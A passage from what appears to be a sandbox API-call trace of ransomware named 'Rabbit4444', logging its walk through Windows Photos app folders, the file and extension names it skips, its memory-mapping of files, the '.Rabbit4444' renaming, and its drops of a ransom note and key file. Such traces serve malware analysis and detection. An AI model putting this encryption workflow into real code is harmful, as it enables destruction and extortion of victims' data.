dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.501] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0065.501] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15681156580) returned 1 [0065.501] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0065.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0065.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0065.501] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0065.502] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0065.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11ddb8 [0065.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0065.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0065.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11ddb8 [0065.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0065.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0065.504] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15681462363) returned 1 [0065.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0065.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0065.504] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.504] CloseHandle (hObject=0x27c) returned 1 [0065.504] CloseHandle (hObject=0x2cc) returned 1 [0065.504] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444") returned 115 [0065.504] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0065.505] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2aa792ec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2aa792ec, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2aa792ec, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0065.505] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.505] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.505] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0065.505] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0065.505] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0065.505] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0065.505] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0065.505] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0065.505] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0065.505] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0065.505] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0065.505] lstrcpyW (in: lpString1=0x130ebe6, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0065.505] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0065.506] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0065.506] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0065.506] lstrlenW (lpString="Rabbit4444") returned 10 [0065.506] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0065.506] lstrlenW (lpString=".dll") returned 4 [0065.506] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0065.506] lstrlenW (lpString=".lnk") returned 4 [0065.506] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0065.506] lstrlenW (lpString=".ini") returned 4 [0065.506] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0065.506] lstrlenW (lpString=".sys") returned 4 [0065.506] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0065.506] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2aa792ec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2aa792ec, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2aa792ec, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0065.506] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0065.506] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.506] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.507] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.511] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.512] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.512] CloseHandle (hObject=0x2cc) returned 1 [0065.512] CloseHandle (hObject=0x2a0) returned 1 [0065.512] GetCurrentThreadId () returned 0xd98 [0065.512] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0065.512] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState" [0065.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122b40 | out: hHeap=0xe0000) returned 1 [0065.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0065.512] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState" [0065.512] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\" [0065.512] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0065.512] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.515] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.517] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.518] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.518] CloseHandle (hObject=0x2a0) returned 1 [0065.519] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState") returned 90 [0065.519] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.519] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0ee0b1c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf05e1488, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0065.519] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.519] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.519] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.519] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.519] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0ee0b1c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf05e1488, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.519] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.519] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.519] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.519] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.519] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.519] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf05e1488, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf05e1488, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf060766a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.519] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.519] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.519] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf05e1488, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf05e1488, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf060766a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.519] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0065.520] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.520] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.521] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.521] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.521] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.521] CloseHandle (hObject=0x2cc) returned 1 [0065.521] CloseHandle (hObject=0x2a0) returned 1 [0065.521] GetCurrentThreadId () returned 0xd98 [0065.521] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0065.521] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState" [0065.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123440 | out: hHeap=0xe0000) returned 1 [0065.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0065.521] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState" [0065.521] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\" [0065.521] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0065.521] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.525] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.527] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.528] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.528] CloseHandle (hObject=0x2a0) returned 1 [0065.529] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState") returned 88 [0065.529] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.529] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x32a78e7c, ftLastAccessTime.dwHighDateTime=0x1d32756, ftLastWriteTime.dwLowDateTime=0xf060766a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0065.529] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.529] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.529] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.529] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.529] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x32a78e7c, ftLastAccessTime.dwHighDateTime=0x1d32756, ftLastWriteTime.dwLowDateTime=0xf060766a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.529] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.530] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.530] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.530] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.530] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.530] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf060766a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf060766a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf060766a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.530] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.530] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.530] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a76bd16, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3a76bd16, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x3b62c681, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MediaDb.v1.sqlite", cAlternateFileName="MEDIAD~1.SQL")) returned 1 [0065.530] lstrcmpiW (lpString1="MediaDb.v1.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.530] lstrcmpiW (lpString1="MediaDb.v1.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.530] lstrcmpiW (lpString1="MediaDb.v1.sqlite", lpString2="Rabbit4444.exe") returned -1 [0065.530] lstrcmpiW (lpString1="MediaDb.v1.sqlite", lpString2=".") returned 1 [0065.530] lstrcmpiW (lpString1="MediaDb.v1.sqlite", lpString2="..") returned 1 [0065.530] lstrcmpiW (lpString1="MediaDb.v1.sqlite", lpString2="windows") returned -1 [0065.530] lstrcmpiW (lpString1="MediaDb.v1.sqlite", lpString2="bootmgr") returned 1 [0065.530] lstrcmpiW (lpString1="MediaDb.v1.sqlite", lpString2="pagefile.sys") returned -1 [0065.530] lstrcmpiW (lpString1="MediaDb.v1.sqlite", lpString2="boot") returned 1 [0065.530] lstrcmpiW (lpString1="MediaDb.v1.sqlite", lpString2="ids.txt") returned 1 [0065.530] lstrcmpiW (lpString1="MediaDb.v1.sqlite", lpString2="NTUSER.DAT") returned -1 [0065.530] lstrcpyW (in: lpString1=0x130ebea, lpString2="MediaDb.v1.sqlite" | out: lpString1="MediaDb.v1.sqlite") returned="MediaDb.v1.sqlite" [0065.530] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite", dwFileAttributes=0x0) returned 1 [0065.530] lstrlenW (lpString="MediaDb.v1.sqlite") returned 17 [0065.530] lstrlenW (lpString="Rabbit4444") returned 10 [0065.530] lstrcmpiW (lpString1=".v1.sqlite", lpString2="Rabbit4444") returned -1 [0065.530] lstrlenW (lpString=".dll") returned 4 [0065.530] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0065.531] lstrlenW (lpString=".lnk") returned 4 [0065.531] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0065.531] lstrlenW (lpString=".ini") returned 4 [0065.531] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0065.531] lstrlenW (lpString=".sys") returned 4 [0065.531] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0065.531] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\mediadb.v1.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.531] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0065.531] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15684178776) returned 1 [0065.531] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4096) returned 1 [0065.531] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0065.531] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0065.531] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1300, lpName=0x0) returned 0x27c [0065.532] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1300) returned 0x70000 [0065.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11ddb8 [0065.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0065.534] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0065.534] RtlAllocateHeap 